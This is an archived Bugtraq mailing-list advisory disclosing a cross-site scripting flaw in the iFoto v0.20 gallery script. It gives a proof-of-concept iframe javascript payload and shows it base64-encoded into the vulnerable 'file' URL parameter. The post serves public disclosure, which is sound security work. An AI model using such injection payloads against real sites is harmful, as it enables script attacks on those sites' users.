iFoto v0.20-06/06/06

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: iFoto v0.20-06/06/06
From: luny@xxxxxxxxxxxxxxx
Date: 8 Jun 2006 21:31:39 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

iFoto v0.20-06/06/06

Homepage:
http://ifoto.ireans.com/

Effected files:

XSS Vulnerability:

The dir path to show the image is base 64 encoded, so to attempt this XSS 
example we encode our codein base64.

The code we'll be using is javascript in an iframe tag. [IFRAME 
SRC="javascript:alert('XSS');"][/IFRAME]

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+

Prev by Date: Dell Openmanage CD Vulnerability
Next by Date: phazizGuestbook v2.0 - XSS
Previous by thread: RE: Dell Openmanage CD Vulnerability
Next by thread: Re: iFoto v0.20-06/06/06
Index(es):
- Date
- Thread